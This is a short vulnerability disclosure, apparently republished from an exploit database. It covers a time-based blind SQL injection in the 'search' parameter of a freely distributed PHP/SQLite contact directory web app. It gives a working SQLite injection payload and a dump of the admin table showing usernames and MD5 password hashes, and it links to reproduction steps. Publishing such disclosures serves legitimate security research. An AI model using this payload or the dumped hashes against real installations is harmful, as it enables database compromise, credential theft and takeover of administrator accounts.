Published on October 5th, 2021 📆 | 3602 Views ⚑
0Local Offices Contact Directory Site SQL Injection – Torchsec
## Vendor:
[href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html)
## Description:
The `search` parameter appears to be vulnerable to time-based blind
SQL injection attacks, on the web app "Local Offices Contact
Directories Site" (by oretnom23).
The malicious attacker can execute a malicious payload and he can dump
hashes authentication credentials. Then the attacker can to
take control of the admin account of the system and can steal
sensitive information and can destroy the system administrative
account.
## Payload:
```sql
---
Parameter: search (GET)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245
AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
```
- dump
```sql
Table: admin_list
[2 entries]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 |
| cblake | cd74fae0a3adf459f73bbf187607ccea |
+----------+----------------------------------+
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421)
## Proof:
[href](https://streamable.com/zmm464)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
Gloss